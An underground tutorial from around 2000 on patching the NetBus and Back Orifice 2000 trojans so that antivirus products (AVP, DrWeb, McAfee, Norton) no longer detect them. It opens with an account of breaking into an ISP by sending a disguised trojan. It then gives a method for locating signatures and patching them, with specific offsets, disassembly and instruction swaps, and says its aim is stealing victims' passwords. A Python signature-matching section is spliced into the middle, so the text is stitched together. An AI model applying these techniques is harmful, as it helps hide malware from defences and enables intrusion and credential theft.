new tr0jans patching tutorial part 1

date       : 10-05-2000 23:48:01
author     : b@$t sh()t of unlimited group
editor     : Phreezer Burn - thanks
version    : 1.0 (yes, this is the first version, with bugs, mistakes and other crap)
home page  : http://infected.ilm.net/unlg/
lovely URL : http://infected.ilm.net/

LEGALESE
--------
i sh4ll n0t b3 h3ld r3sp0ns1bl3 f0r any d4m4g3 cr34t3d by d1r3ct or 1nd1r3ct use of th3 publ1c1s3d m4t3r14l. th1s d0cum3nt 1s c0pyr1ted 2000 t0 m3, b@$t sh()t of unl!m!ted group. h3r3w1th i gr4nt anyb0dy l1cens3 t0 r3d1str1bute th1s d0cum3nt as l0ng as it is k3pt in wh0l3 and th3 c0pyr1t3 n0t1c3 iz n0t r3m0v3d. als0 if i f1nd any lAm3rz wh0 just take the c0de published h3r3 and s4y it is their 0wn i w1ll s33 th4t they'll b3 punished (b3l13v3 it or n0t :-))!!! (i'll get you! ;-)

FROM AUTHOR
-----------
One sunny day I found I needed to hack an internet service provider for revenge (yes, revenge >:-]~~~ ). I knew all about that company, but everything was protected by a firewall and antivirus software. I really needed to hack the account server, and the easiest way to succeed was to send a trojan to a lame girl-operator disguised as a love letter. Because the server had antivirus software, I needed a trojan that would avoid detection. I liked BO and didn't want to write another trojan (I have no free time, and I am too lazzzy ;-). For this reason I used HIEW, and after some hours I had an undetectable trojan. Thus that provider was hacked and I got all the passwords. Easy? Yes! You need passwords (dialup, ICQ, server access)? Do not try to hack routers and install sniffers! Send the victim one trojan and get all that you want! Whoa! The motto of trojan use: get all that you want ;-) Somewhere I hear this is crap, hehe. I didn't want to write this manual 'coz I am very lazy and I do not have much free time, but Phreezer Burn asked me about trojan patching and I don't know of any docs written about this subject :-(.
So, I wrote this manual for him. Say thanks to him, and to me too ;-)

INTRODUCTION
------------
Welcome to my first tutorial about computers. Sorry, I do not know English very well and can make many mistakes. I think my editor will correct the text, but the original is very difficult to understand. OK, let's go.

THE TOOLS
---------
The first thing you must know is x86 assembler (sorry man, but if you don't know it you can't patch/crack any program). The best way to learn is time and books. You need a lot of time to understand assembler (heh, just to remember the commands). x86, 286, protected mode, real mode, 386, Pentium, Pentium II, Pentium III, MMX, 3dNow! .... ohh, there are many commands on my computer, and you must know them all! (hint: I don't know all the commands, but I am a smartass and have many cool books ;-) You must also know how to use a debugger (any one; I like Turbo Debugger from TP 7.0 and SoftIce).

ooops.... all that I wrote 1 min before was bullshit! You only need to know assembler and the logic of executable files!

The tools for exploring and patching:

windows 9*     - you must work only on a leet OS ;-)
hex editor     - for changing bytes in tr0jans I recommend HIEW by S.E.N. If you want HIEW, try to find it at infected.ilm.net
antivirus soft - this is the software for testing your trojan.
                 AVP: a very big database of masks.
                 DrWeb: the best software IMHO, Mr. Daniloff wrote a nice FAQ.
                 McAfee: I like this antivirus 'coz it is installed with the Hotmail free email service and detects all new trojans (but my trojans live 3-6 months ;-).
                 Norton Antivirus: sometimes you will patch trojans against this antivirus.

That's all.

THE GENERAL STUFF
-----------------
"The teknology" that antivirus software uses for detecting viruses, trojans and other kewl stuff that is very bad is this: they all use a mask, I call it a "magic mask" (c) b.$. //UnlG ;-) A magic mask is a part of the code which exists in only 1 file in the w0rld.
Meaning, the "magic mask" is a unique part of the code of a phile that is found only in that file, and in no other philez anywhere. As you know, on the Internet you can download some hundreds of millions of unique files, and the work of the antivirus men is to discover the programs and "extract" that magic mask. That's all. (hint: modern antivirus software uses a very smart mask, or several masks, for one phile)

OLD STYLE MASK (hex):
\x00\x12\x45\x00\x00\x00\x89\x88\x88\x87

If your file contains that chain in its body, the antivirus warns you about a virus in the file. (this is not a real mask) If you change only one byte in the file, the antivirus does not warn about anything interesting in the file.

NEW MASK, smart (hex):
\x00\x12\x??\x??\x??\x??\x??\x88\x88\x87
\x?? - any byte (non stable)

This mask is very difficult to extract, though the new tekniq is pretty nice, 'coz you must change only the stable bytes (not \x??). Do you understand? I hope the answer is yeaahh! ;-) The new viruses are detected only with the new mask, 'coz many people like to patch/change viruses for further spreading via the Internet. Only a clever coder/patcher can 100% patch code against an antivirus.

I forgot to write about another smart mask! Damn, my brain has got a kernel panic ;-) Smart mask 2 does not compare whole bytes, it compares bits! Yeah! Bit masking is now used in advanced software. But every method has "mistakes", OOPS, not mistakes but very bad situations when the method doesn't work right. Man's logic always wins against machine coded algorithms.

YOUR WORK
---------
The best way to study patching is through work; you must work hard. You should study methods of programming/compiling of assembler and code. If you decompile and work with about 50 MB of executable code, you will become very clever and smart ;-) ohh... at that point I think you should know assembler (a little). And now let's start to work on our new patched version of .... hmm .... NetBus 1.60!
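The three kinds of mask described here (exact bytes, \x?? wildcards and bit masks), run against the NetBus fragment quoted in the recoding example further down, in its original order and with the two MOVs exchanged. This is an added example, not code from the tutorial or from any antivirus product; the signature notation, the scanner and the sample file are assumptions made for illustration:

```python
"""Three kinds of antivirus "magic mask" and how each reacts to an
instruction swap.  Added example (not from the tutorial and not any
vendor's engine): the signature format and the scanner are assumptions
made for illustration.  The two byte strings are the NetBus fragment
quoted in the recoding example, before and after the MOVs are exchanged.
"""
from typing import List, Optional, Tuple

# Constructed test data: the 23-byte fragment from the tutorial.
# jae / mov eax,imm32 / mov edx,imm32 / call / push 8
ORIGINAL = bytes.fromhex("0F8386000000B8B4894500BA98544500E8CFE4FAFF6A08")
# Same fragment with the two MOV instructions exchanged ("recoded bytes").
SWAPPED = bytes.fromhex("0F8386000000BA98544500B8B4894500E8CFE4FAFF6A08")

# A signature is a list of (value, mask) pairs.  A scanned byte b matches
# a pair when (b & mask) == (value & mask):
#   mask 0xFF -> the byte must be exactly `value`  (old style mask)
#   mask 0x00 -> any byte                          (the tutorial's \x??)
#   other     -> only the bits set in mask count   ("smart mask 2")
Signature = List[Tuple[int, int]]


def parse_sig(text: str) -> Signature:
    """Parse a signature string into (value, mask) pairs.

    Tokens: 'AB' exact byte, '??' any byte, 'AB/MM' bit mask (compare only
    the bits set in MM).  The tutorial's '\\xAB' spelling is accepted too.
    """
    sig: Signature = []
    for tok in text.replace("\\x", " ").split():
        if tok == "??":
            sig.append((0x00, 0x00))
        elif "/" in tok:
            val, mask = tok.split("/")
            sig.append((int(val, 16), int(mask, 16)))
        else:
            sig.append((int(tok, 16), 0xFF))
    return sig


def scan(data: bytes, sig: Signature) -> Optional[int]:
    """Offset of the first match of sig in data, or None if it never fires."""
    n = len(sig)
    for off in range(len(data) - n + 1):
        if all((data[off + i] & m) == (v & m) for i, (v, m) in enumerate(sig)):
            return off
    return None


# 1. Old style mask: every byte of the fragment, exactly.
OLD_STYLE = parse_sig(ORIGINAL.hex(" "))
# 2. Wildcard mask: keep the stable jae/call/push bytes and treat the ten
#    bytes of the two MOVs as \x??, so their order no longer matters.
WILDCARD = parse_sig(
    "0F 83 86 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 CF E4 FA FF 6A 08")
# 3. Bit mask: 'mov r32,imm32' is encoded B8+reg (B8..BF), so comparing only
#    the top five bits (mask F8) matches the opcode whatever register was
#    used, while the immediates stay wildcarded.
BITMASK = parse_sig(
    "0F 83 86 00 00 00 B8/F8 ?? ?? ?? ?? B8/F8 ?? ?? ?? ?? E8 CF E4 FA FF 6A 08")

SIGNATURES = {"old style": OLD_STYLE, "wildcard": WILDCARD, "bit mask": BITMASK}


def detections(data: bytes) -> dict:
    """Which signature kinds fire on data, and at what offset (None = miss)."""
    return {name: scan(data, sig) for name, sig in SIGNATURES.items()}


# Constructed "file": the fragment buried in 0x61 filler, the byte the
# tutorial uses when blanking out regions of a sample.
SAMPLE_FILE = b"\x61" * 0x200 + ORIGINAL + b"\x61" * 0x100

if __name__ == "__main__":
    for label, data in (("original", ORIGINAL), ("swapped", SWAPPED)):
        print(label, detections(data))
    print("sample file: old style mask hits at", hex(scan(SAMPLE_FILE, OLD_STYLE)))
```

The exact mask stops matching as soon as the two MOVs trade places, while the wildcard and bit-mask forms still fire at the same offset, which is why the tutorial's "only stable bytes count" remark matters to anyone writing signatures.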
I like the graphical client and the little explorer in the client. To find the "magic mask," you must fill (with \x20 or \x61) 1 KB from the start of the phile and then scan it with AVP. If the antivirus software does not detect anything, the mask is here, in the first 1000 bytes of the phile. If AVP still detects the NetBus trojan, fill the next 1000 bytes of the phile (from offset 1000 to 2000), and repeat the filling till you find the place of the mask (remember! new antivirus software has one or more masks). To save time, I copy the trojan into 10 philes and fill them like this:

 1: 0-1000 bytes
 2: 1000-2000 bytes
 3: 2000-3000 bytes
 4: 3000-4000 bytes
 5: 4000-5000 bytes
 6: 5000-6000 bytes
 7: 6000-7000 bytes
 8: 7000-8000 bytes
 9: 8000-9000 bytes
10: 9000-10000 bytes

If you don't find the offset of the mask in these 10 files, repeat from offset 10000. When you find the offset, you begin to fill from the current offset in steps of 100 bytes. Example: AVP doesn't detect the trojan in file 8 (filled part from 7000 to 8000). So you start to fill from offset 7000 in 100-byte steps to find the exact offset of the start of the magic mask. After finding the start, you can fill every assembler command to find the exact mask (I can detect all byte masks; sometimes I detect bit masks, but it's very difficult, smartassed programmers don't like patched viruses and trojans ;-) (hint: the mask is not more than 100-200 bytes) When you find the part of the code which is detectable by AVP, you must recode this part. Remember I said that you must know x86 assembler? hehe, now your skill will help you... or maybe not ;-) If you kill any assembler command your trojan will not work right.
It will crash the remote system, and this does not help you get passwords for XXX sites ;-) You must recode the code like this (the simplest method):

original bytes
--------------
000547E0: 0F8386000000  jae 00005486C           -------- (1)
000547E6: B8B4894500    mov eax,0004589B4       <- exchange it
000547EB: BA98544500    mov edx,000455498       <- (AVP 2 mask)
000547F0: E8CFE4FAFF    call 000002CC4          -------- (2)
000547F5: 6A08          push 008

recoded bytes
-------------
000547E0: 0F8386000000  jae 00005486C           -------- (1)
000547E6: BA98544500    mov edx,000455498
000547EB: B8B4894500    mov eax,0004589B4
000547F0: E8CFE4FAFF    call 000002CC4          -------- (2)
000547F5: 6A08          push 008

the mask (not exact):
0F8386000000B8B4894500BA98544500E8CFE4FAFF6A08
we change it to:
0F8386000000BA98544500B8B4894500E8CFE4FAFF6A08

I exchanged 2 assembler commands to change the mask. The MOV command moves (I describe Intel assembler, not AT&T) the number 0004589B4 into the register eax (f**k, read the description of the special registers of the x86 processor in a manual :-); the second command that I exchanged moves the number 000455498 into the register edx. It's unimportant which of these 2 commands executes first, and I use this exchange for an easy patch of the code. The trojan works correctly 'coz all of the commands execute right. But AVP cannot find "the mask"! That's right, we have achieved our purpose: our server/trojan is not detectable by crappy antivirus.

EXAMPLE:
--------
This is one of my real patching projects: "antivirus patch for netbus 1.60(4) patch descripti0n". See the add-on at the end.

SOME HINTS/ADVICES:
-------------------
1. Some trojans create some files (data, dll, other crap); antiviruses often detect these files when somebody tries to create them. You must patch the entire package. Install the trojan on your own system and test it. When I patch a trojan, I install it 10-50 times every hour 8-) but the work is done correctly every time.

2. Some philes are very long, possibly over 500 KB; think about a fast method to find the nearest 100 KB of code with the mask!
If you fill a 900 KB file up to the end in 1000-byte steps you lose too much time. My advice: cut the phile into 4 equal parts and check which part contains the mask; use the part with the mask for further search.

3. Use only the easy patch method (command exchange).

4. Find fravia's web server and study cracking. Patching is much like cracking, but cracking is the art, whereas hacking and patching are just the work.

5. I know about a little program by Zombie (hey! nice work man) which can hack the AVP database. I like it, but my laziness doesn't allow me to compile it and use it against this software, but if you like to compile you can find this program at ..... [3 min later] ..... the 29A virus emag. This is a kewl emag, and I like to read it to my kidz as a bedtime tale ;-)

9. You should read my hints chapter often. I write more interesting stuff here than in the rest of my manual.

So, I am not a writer, not a coder, not a cracker, not a hacker, not a..... f**k, what am I?? 8-)

CREDITS
-------
dark nigth       - some text I ripped from his VBB manual
unlimited group  - my lovely group - all manuals, docs, advs, progs I wrote 4 them.
Phreezer Burn    - hi man! this is your manual too, use it and hack th3 l4m3rz ;-)
infected.ilm.net - they allow our group to publish all that we want
eFFeCT design    - for the design of our home page
UCF2000          - always first! ;-)
29A              - the new virus/research force - i nearly fear....8-[ brr

ADD ON!
_______
======================================================-[2000-01-18 UnlG]-====
antivirus patch for netbus 1.60(4) patch descripti0n
unlimited group
t0pic: if you want to get some dialup passwords from a "lame user," use a patched version of the tr0jan, 'cause official releases will be caught by antivirus :-(
release against: drWeb 4.11 and AVP 3.0 build 131
category: info
ann0unced: 2000-01-18
linux 0nly: nope, kewl win32 version
disc0vered: b@$t sh()t //UnlG
=[ secure!
full description ]================================.private.=======

Netbus 1.60 4th patch (I think somebody sent my patch to Kaspersky ;-)

keyHook.dll (AVP mask a21e-a228)

0000A21B: 83C4B4        add esp,-04C ;"L"       <- exchange it
0000A21E: B8C0AD4000    mov eax,00040ADC0       <- (AVP sucks)
0000A223: E8D89AFFFF    call 000003D00          -------- (1)
0000A228: A1ACB24000    mov eax,[00040B2AC]
0000A22D: C70084AC4000  mov d,[eax],00040AC84

patch.exe (AVP masks 547e6-54886 and 54a7f-54a89 and "keyhook.part")

000547E0: 0F8386000000  jae 00005486C           -------- (1)
000547E6: B8B4894500    mov eax,0004589B4       <- exchange it
000547EB: BA98544500    mov edx,000455498       <- (AVP 2 mask)
000547F0: E8CFE4FAFF    call 000002CC4          -------- (2)
000547F5: 6A08          push 008
000547F7: 8D45FC        lea eax,[ebp][-0004]
000547FA: B9A8544500    mov ecx,0004554A8
000547FF: 8B15B4894500  mov edx,[0004589B4]
00054805: E82EE7FAFF    call 000002F38          -------- (3)
0005480A: 8B4DFC        mov ecx,[ebp][-0004]
0005480D: B201          mov dl,001
0005480F: A178514500    mov eax,[000455178]
00054814: E8E3FDFFFF    call 0000545FC          -------- (4)
00054819: A3B8894500    mov [0004589B8],eax
0005481E: A1B8894500    mov eax,[0004589B8]
00054823: 8B5814        mov ebx,[eax][00014]
00054826: 8B03          mov eax,[ebx]
00054828: 85C0          test eax,eax
0005482A: 742C          je 000054858            -------- (5)
0005482C: 50            push eax
0005482D: 6AFF          push 0FF
0005482F: 6800000F00    push 0000F0000
00054834: E81303FBFF    call 000004B4C          -------- (6)
00054839: 8BF0          mov esi,eax
0005483B: 6A00          push 000
0005483D: 6A00          push 000
0005483F: 6A12          push 012
00054841: 8B4304        mov eax,[ebx][00004]
00054844: 50            push eax
00054845: E8AA08FBFF    call 0000050F4          -------- (1)
0005484A: 6AFF          push 0FF
0005484C: 56            push esi
0005484D: E87203FBFF    call 000004BC4          -------- (2)
00054852: 56            push esi
00054853: E81C01FBFF    call 000004974          -------- (3)
00054858: E8CF01FBFF    call 000004A2C          -------- (4)
0005485D: 8903          mov [ebx],eax
0005485F: A130754500    mov eax,[000457530]
00054864: 8B00          mov eax,[eax]
00054866: 8B4024        mov eax,[eax][00024]
00054869: 894304        mov [ebx][00004],eax
0005486C: 33C0          xor eax,eax
0005486E: 5A            pop edx
0005486F: 59            pop ecx
00054870: 59            pop ecx
00054871: 648910        mov fs:[eax],edx
00054874: 6889544500    push 000455489
00054879: 8D45FC        lea eax,[ebp][-0004]
0005487C: E8EFE3FAFF    call 000002C70          -------- (1)
00054881: C3            retn
00054882: E909DEFAFF    jmp 000002690           -------- (2)
00054887: EBF0          jmps 000054879          -------- (3)
00054889: 5E            pop esi
0005488A: 5B            pop ebx
0005488B: 59            pop ecx
0005488C: 5D            pop ebp
0005488D: C3            retn

and/or ;-)

00054A79: 8BEC          mov ebp,esp
00054A7B: 83C4F4        add esp,-00C
00054A7E: 53            push ebx                <- exchange it
00054A7F: B8D8544500    mov eax,0004554D8       <- (heh AVP)
00054A84: E837FEFAFF    call 0000048C0          -------- (1)
00054A89: 8B1D30754500  mov ebx,[000457530]

part of keyhook (patch it tooooo...)

000690CB: 83C4B4        add esp,-04C ;"L"       <- exchange it
000690CE: B8C0AD4000    mov eax,00040ADC0       <- (AVP flyy..)
000690D3: E8D89AFFFF    call 000062BB0          -------- (2)
000690D8: A1ACB24000    mov eax,[00040B2AC]
000690DD: C70084AC4000  mov d,[eax],00040AC84

bonus info! <- I like it!

patch.exe
00051C25: BA31D40000    mov edx,00000D431       <- port bind ;-)
00051C2A: 8B83DC010000  mov eax,[ebx][0000001DC]
00051C30: E8B384FEFF    call 00003A0E8          -------- (3)

netbus.exe
0005EA80: 8B804C020000  mov eax,[eax][00000024C]
0005EA86: BA31D40000    mov edx,00000D431       <- port connect!
0005EA8B: E8C43EFEFF    call 000042954          -------- (2)
0005EA90: 8B45FC        mov eax,[ebp][-0004]

3039 - 12345 original
D431 - 54321 patch 3
1770 - 6000  patch 4! ;-)

Another bonus: NetBus stores its password in clear text in the registry:
[HKEY_CURRENT_USER\PATCH\Settings]
"ServerPwd"="unlg"

II. S0luti0n
trust no1, and never trust antivirus companies :-))

antivirus patch for netbus 1.60(4) patch descripti0n
unlimited group
===============================================================.private.=====
unlimited gr0up
Home Page: http://infected.ilm.net/unlg/
Our Web Site: http://infected.ilm.net/
c0nfidential c0ntacts: 0nly "real life" chat
n0t c0nfidential c0ntacts: undernet#c0de or unlg@hotmail.com
PGP Key: i hate PGP and 0ther crappy t00lz XoR crypting rules! ;-)
Greetz: SGWW, UCL, uCF, SoS, 29A and other kewl ppl!
======================================================-[2000-01-18 UnlG]-====

ADDON! END
__________

I added the second add-on after writing the doc. Phreezer needed it. Maybe you too will decide that it is helpful information.

second add on
_____________
======================================================-[2000-01-13 UnlG]-====
antivirus patch for back orifice 2000 patch descripti0n
unlimited group
t0pic: if you want to get some dialup passwords from a "lame user", use a patched version of the tr0jan, 'cause official releases will be caught by antivirus :-(
release against: drWeb 4.11 and AVP 3.0 build 131
category: info
ann0unced: 2000-01-13
linux 0nly: nope, kewl win32 version
disc0vered: b@$t sh()t //UnlG
=[ secure!
full description ]===================================.private.====

=-=-=-=-[bo2k.exe server file]-=-=-=-=

bo2k.exe: --> program entry point: AVP and drWeb checking code:

00011CD6: 55            push ebp
00011CD7: 8BEC          mov ebp,esp
00011CD9: 81EC780C0000  sub esp,000000C78
00011CDF: 53            push ebx
00011CE0: 56            push esi
00011CE1: 33DB          xor ebx,ebx             <- exchange it
00011CE3: 57            push edi                <- (AVP)
00011CE4: 53            push ebx
00011CE5: FF15A4311503  call GetModuleHandleA ;KERNEL32.dll
00011CEB: A3D0CC1503    mov [00315CCD0],eax
00011CF0: E825C2FFFF    call 00000DF1A          -------- (1)
00011CF5: E855CBFFFF    call 00000E84F          -------- (2)
00011CFA: BF5CA81503    mov edi,00315A85C
00011CFF: 6870AA1503    push 00315AA70
00011D04: 57            push edi
00011D05: E8DDC5FFFF    call 00000E2E7          -------- (3)
00011D0A: 6864AB1503    push 00315AB64
00011D0F: 57            push edi
00011D10: 8945E4        mov [ebp][-001C],eax
00011D13: E8CFC5FFFF    call 00000E2E7          -------- (4)
00011D18: 83C410        add esp,010
00011D1B: 8945FC        mov [ebp][-0004],eax
00011D1E: FF1540311503  call GetCommandLineA ;KERNEL32.dll
00011D24: 8BF0          mov esi,eax
00011D26: 381E          cmp [esi],bl
00011D28: 743F          je 000011D69            -------- (1)
00011D2A: 46            inc esi
00011D2B: 807EFF20      cmp b,[esi][-0001],020 ;" "
00011D2F: 75F5          jne 000011D26           -------- (2)
00011D31: 381E          cmp [esi],bl
00011D33: 7434          je 000011D69            -------- (3)
00011D35: 684CAB1503    push 00315AB4C
00011D3A: 57            push edi
00011D3B: E8A7C5FFFF    call 00000E2E7          -------- (4)
00011D40: 59            pop ecx
00011D41: 85C0          test eax,eax
00011D43: 59            pop ecx
00011D44: 7423          je 000011D69            -------- (5)
00011D46: 8B3D94301503  mov edi,[003153094]
00011D4C: 56            push esi
00011D4D: FFD7          call edi
00011D4F: 85C0          test eax,eax
00011D51: 7516          jne 000011D69           -------- (6)
00011D53: FF1514311503  call GetLastError ;KERNEL32.dll
00011D59: 83F802        cmp eax,002
00011D5C: 740B          je 000011D69            -------- (7)
00011D5E: 6A64          push 064                drWeb point (chg to 6A65h)
00011D60: FF156C311503  call Sleep ;KERNEL32.dll
00011D66: 56            push esi
00011D67: EBE4          jmps 000011D4D          -------- (1)
00011D69: 395DFC        cmp [ebp][-0004],ebx
00011D6C: 0F84F5040000  je 000012267            -------- (2)
00011D72: 391DBCAD1503  cmp [00315ADBC],ebx
00011D78: 895DF8        mov [ebp][-0008],ebx
00011D7B: C745EC2CAA1503 mov d,[ebp][-0014],00315AA2C
00011D82: 7507          jne 000011D8B           -------- (3)
00011D84: C745ECF4A91503 mov d,[ebp][-0014],00315A9F4
00011D8B: 8D8588F3FFFF  lea eax,[ebp][0FFFFF388]
00011D91: 6800020000    push 000000200
00011D96: 50            push eax
00011D97: FF35D0CC1503  push d,[00315CCD0]
00011D9D: FF15B4311503  call GetModuleFileNameA ;KERNEL32.
00011DA3: 685CAA1503    push 00315AA5C
00011DA8: 685CA81503    push 00315A85C
00011DAD: E866C4FFFF    call 00000E218          -------- (4)

drWeb mask 11D5E to 11D9D (any byte)
AVP mask 11CD0 to 11D59 (may be any byte)

drWeb patch :
00011D5E: 6A64          push 064                drWeb point (change to push 065 = 6A65h)???

AVP patch :
00011CE1: 33DB          xor ebx,ebx             <- exchange it
00011CE3: 57            push edi                <- (AVP)

(a little dll patch: bo2k.exe has a little file inside! patch it too!)
0001CE13: 8B442404      mov eax,[esp][00004]
0001CE17: A3B45C0010    mov [010005CB4],eax     <- exchange it
0001CE1C: 6A01          push 001                <- (DrWeb)
0001CE1E: 58            pop eax
and
0001CF38: 8B4E10        mov ecx,[esi][00010]
0001CF3B: 8BD7          mov edx,edi             <- exchange it
0001CF3D: 8BC1          mov eax,ecx             <- (AVP)
0001CF3F: C1E803        shr eax,003

=-=-=-=-[bo2kcfg.exe configurator]-=-=-=-=

bo2kcfg.exe: --> program entry point: Web checking code:

00006BFA: 55            push ebp
00006BFB: 8BEC          mov ebp,esp
00006BFD: 6AFF          push 0FF
00006BFF: 6870F24100    push 00041F270
00006C04: 68C0984000    push 0004098C0          <- exchange
00006C09: 64A100000000  mov eax,fs:[000000000]  <- antiWeb
00006C0F: 50            push eax
00006C10: 64892500000000 mov fs:[000000000],esp
00006C17: 83EC58        sub esp,058 ;"X"
00006C1A: 53            push ebx
00006C1B: 56            push esi
00006C1C: 57            push edi
00006C1D: 8965E8        mov [ebp][-0018],esp
00006C20: FF15D4D14100  call GetVersion ;KERNEL32.dll

AVP checking code:

000053FF: 892500000000  mov [000000000],esp
00005405: 81ECFC010000  sub esp,0000001FC
0000540B: 56            push esi
0000540C: 8BF1          mov esi,ecx
0000540E: 56            push esi
0000540F: 6878414200    push 000424178
00005414: 6804100000    push 000001004
00005419: 6A00          push 000
0000541B: 6870414200    push 000424170
00005420: 6A01          push 001
00005422: 8D4C2420      lea ecx,[esp][00020]
00005426: E887C60000    call 000011AB2          -------- (1)
0000542B: 8D4C2408      lea ecx,[esp][00008]
0000542F: C784240802000000000000 mov d,[esp][000000208],000000000
0000543A: E8D5C70000    call 000011C14          -------- (2)
0000543F: 83F801        cmp eax,001
00005442: 7536          jne 00000547A           -------- (3)
00005444: 8D442404      lea eax,[esp][00004]
00005448: 8D4C2408      lea ecx,[esp][00008]
0000544C: 50            push eax
0000544D: E89DC80000    call 000011CEF          -------- (4)
00005452: 8B00          mov eax,[eax]           <--- exchange
00005454: 8BCE          mov ecx,esi             <--- it (AVP)
00005456: 50            push eax
00005457: 6804040000    push 000000404
0000545C: C684241002000001 mov b,[esp][000000210],001
00005464: E8871E0100    call 0000172F0          -------- (1)
00005469: 8D4C2404      lea ecx,[esp][00004]
0000546D: C684240802000000 mov b,[esp][000000208],000
00005475: E8ADF00000    call 000014527          -------- (2)
0000547A: 8D8C24B4000000 lea ecx,[esp][0000000B4]
00005481: C784240802000002000000 mov d,[esp][000000208],000000002
0000548C: E896F00000    call 000014527          -------- (3)
00005491: 8D4C2408      lea ecx,[esp][00008]
00005495: C7842408020000FFFFFFFF mov d,[esp][000000208],0FFFFFFFF
000054A0: E8E8E60000    call 000013B8D          -------- (4)
000054A5: 8B8C2400020000 mov ecx,[esp][000000200]
000054AC: 5E            pop esi
000054AD: 64890D00000000 mov fs:[000000000],ecx
000054B4: 81C408020000  add esp,000000208
000054BA: C3            retn

drWeb mask 6BFA to 6C10 (any byte)
AVP mask 5400 to 54A0 (may be any byte)

drWeb patch :
00006BFF: 6870F24100    push 00041F270
00006C04: 68C0984000    push 0004098C0          <- exchange
00006C09: 64A100000000  mov eax,fs:[000000000]  <- antiWeb

AVP patch :
00005452: 8B00          mov eax,[eax]           <--- exchange
00005454: 8BCE          mov ecx,esi             <--- it (AVP)

=-=-=-=-[bo2kgui.exe win32 GUI client]-=-=-=-=

bo2kgui.exe: ----> program entry point

Web checking code:

0001154E: 55            push ebp
0001154F: 8BEC          mov ebp,esp
00011551: 6AFF          push 0FF
00011553: 68C0A74400    push 00044A7C0
00011558: 680C524100    push 00041520C          <-- exchange
0001155D: 64A100000000  mov eax,fs:[000000000]  <-- it! (drWeb)
00011563: 50            push eax
00011564: 64892500000000 mov fs:[000000000],esp
0001156B: 83EC58        sub esp,058 ;"X"
0001156E: 53            push ebx
0001156F: 56            push esi
00011570: 57            push edi
00011571: 8965E8        mov [ebp][-0018],esp
00011574: FF15B8524400  call GetVersion ;KERNEL32.dll

AVP checking code:

0000FDA0: 83EC10        sub esp,010
0000FDA3: 56            push esi
0000FDA4: 57            push edi
0000FDA5: 8BF1          mov esi,ecx
0000FDA7: E8FEA20100    call 00002A0AA          -------- (1)
0000FDAC: 680F080000    push 00000080F
0000FDB1: 8BCE          mov ecx,esi
0000FDB3: E84FE50100    call 00002E307          -------- (2)
0000FDB8: 8B501C        mov edx,[eax][0001C]
0000FDBB: 8D4C2408      lea ecx,[esp][00008]
0000FDBF: 51            push ecx
0000FDC0: 52            push edx
0000FDC1: FF15DC554400  call GetClientRect ;USER32.dll
0000FDC7: 8B442414      mov eax,[esp][00014]
0000FDCB: 8B4C240C      mov ecx,[esp][0000C]
0000FDCF: 8B542408      mov edx,[esp][00008]
0000FDD3: 8B3D4C554400  mov edi,[00044554C]
0000FDD9: 2BC1          sub eax,ecx
0000FDDB: 8B4C2410      mov ecx,[esp][00010]
0000FDDF: 6A01          push 001
0000FDE1: 2BCA          sub ecx,edx
0000FDE3: 50            push eax
0000FDE4: 51            push ecx
0000FDE5: 6A01          push 001
0000FDE7: FFD7          call edi
0000FDE9: 2B442420      sub eax,[esp][00020]
0000FDED: 99            cdq
0000FDEE: 2BC2          sub eax,edx
0000FDF0: D1F8          sar eax,1
0000FDF2: 50            push eax
0000FDF3: 6A00          push 000
0000FDF5: FFD7          call edi
0000FDF7: 8B4C2420      mov ecx,[esp][00020]
0000FDFB: 2BC1          sub eax,ecx
0000FDFD: 8BCE          mov ecx,esi
0000FDFF: 99            cdq
0000FE00: 2BC2          sub eax,edx
0000FE02: D1F8          sar eax,1
0000FE04: 50            push eax
0000FE05: E8D9E60100    call 00002E4E3          -------- (1)
0000FE0A: 8B561C        mov edx,[esi][0001C]    <- exchange
0000FE0D: 6A00          push 000                <- it (AVP)
0000FE0F: 68B80B0000    push 000000BB8
0000FE14: 6A45          push 045
0000FE16: 52            push edx
0000FE17: FF1510554400  call SetTimer ;USER32.dll
0000FE1D: 5F            pop edi
0000FE1E: B801000000    mov eax,000000001
0000FE23: 5E            pop esi
0000FE24: 83C410        add esp,010
0000FE27: C3            retn
0000FE28: 9090909090909090 nop (s)
0000FE30: 8B442404      mov eax,[esp][00004]
0000FE34: 56            push esi
0000FE35: 83F845        cmp eax,045 ;"E"
0000FE38: 8BF1          mov esi,ecx
0000FE3A: 7507          jne 00000FE43           -------- (1)
0000FE3C: 6A00          push 000
0000FE3E: E842A10100    call 000029F85          -------- (2)
0000FE43: 8BCE          mov ecx,esi
0000FE45: E848B80100    call 00002B692          -------- (3)
0000FE4A: 5E            pop esi
0000FE4B: C20400        retn 00004
0000FE4E: 90            nop
0000FE4F: 90            nop
0000FE50: 56            push esi
0000FE51: 8BF1          mov esi,ecx
0000FE53: 6A00          push 000
0000FE55: E82BA10100    call 000029F85          -------- (1)
0000FE5A: 8BCE          mov ecx,esi
0000FE5C: E831B80100    call 00002B692          -------- (2)
0000FE61: 5E            pop esi
0000FE62: C20C00        retn 0000C
0000FE6F: 9090909090909090909090 nop (s)
0000FE70: E8B7A60100    call 00002A52C          -------- (3)
0000FE75: 85C0          test eax,eax
0000FE77: 7408          je 00000FE81            -------- (1)
0000FE79: 8B10          mov edx,[eax]
0000FE7B: 8BC8          mov ecx,eax
0000FE7D: FF5274        call d,[edx][00074]
0000FE80: C3            retn
0000FE81: 33C0          xor eax,eax
0000FE83: C3            retn
0000FE84: 8B01          mov eax,[ecx]
0000FE86: FFA0C4000000  jmp d,[eax][0000000C4]
0000FE8C: 8B01          mov eax,[ecx]
0000FE8E: FFA0C8000000  jmp d,[eax][0000000C8]

drWeb mask 11553 to 1155D (any byte)
AVP mask FDA0 to FE90 (may be any byte)

drWeb patch :
00011553: 68C0A74400    push 00044A7C0
00011558: 680C524100    push 00041520C          <-- exchange
0001155D: 64A100000000  mov eax,fs:[000000000]  <-- it! (drWeb)

AVP patch :
0000FE0A: 8B561C        mov edx,[esi][0001C]    <- exchange
0000FE0D: 6A00          push 000                <- it (AVP)

=-=-=-=-[bo_peep.dll hijack plugin]-=-=-=-=

bo_peep.dll: ----> program entry point

Web checking code:

00003819: 8B442408      mov eax,[esp][00008]
0000381D: 48            dec eax
0000381E: 7509          jne 000003829           -------- (1)
00003820: 8B442404      mov eax,[esp][00004]
00003824: A384660010    mov [010006684],eax     <- exchange
00003829: 6A01          push 001                <- it (drWeb)
0000382B: 58            pop eax
0000382C: C20C00        retn 0000C

AVP checking code: (hijack??)
0000389B: 890DA8660010  mov [0100066A8],ecx
000038A1: A3B0660010    mov [0100066B0],eax
000038A6: 8915C8660010  mov [0100066C8],edx     <- exchange it
